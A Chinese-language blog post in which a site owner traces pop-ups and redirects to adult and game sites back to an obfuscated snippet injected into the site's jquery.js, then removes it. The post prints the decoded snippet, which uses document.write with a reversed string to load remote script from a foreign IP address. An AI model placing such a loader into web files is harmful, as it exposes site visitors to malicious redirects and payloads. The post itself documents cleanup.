很早之前通过手机访问我的网站的时候,就发现会自动跳转到某些小片片的网站,今天PC访问,本没有什么问题,可是后来发现有一个不安全的脚本被chrome拦截
出现不安全脚本
于是我就好奇,这到底是设个什么呢,运行这个脚本以后自动弹出了网页
t弹出了十分带有挑衅性质的网页
这个网页简直了,右侧自动打码,防止河蟹
随后便进入了一个国外的页游
我在想这到底事如何实现的呢
当运行这个脚本的时候,chrome地址栏的https变为红色
终于体会到加SSL/HTTPS的好处,简单明了
首先针对不安全的页面进行分析
通过审查元素可以看出有一个未知的chrome扩展插件,后来查明是之前安装用来发emoji表情的,为了安全起见,先将其删除。
删除后仍然存在不安全脚本,排除Chome扩展插件植入问题
继续分析发现有这个奇怪的网址
这又一个奇怪的网址,查询IP后得知
是一个国外IP
翻遍了网站首页源码,却找不到这个网址
继续分析源码,发现一个奇怪的JS藏在其中
发现这个JS正是来自于这个IP
一个普通的JS加密,我曾经写过更复杂的,上学期学习CSS&DIV课程时,为了防止web作业被抄袭,写过JS跳转代码,又担心被别人发现,做了多重JS加密(那个我自己都解不开了=。=
解密的时候自动提示已被编码
解密后的js
var _0xc790 = [ "", "join", "reverse", "split", '>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<', "write" ];
document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0]));
发现奇怪JS后,果断删除其中内容
本来想下载到本地后在删除其中代码
万万没想到
FTP下载后直接报毒
果断删除该文件,后来想想,可能有的其他地方需要jQuery
去官方下载安全正常的js文件
覆盖掉旧的JQUERY.JS后
就没有弹窗,和不安全的脚本了
网友评论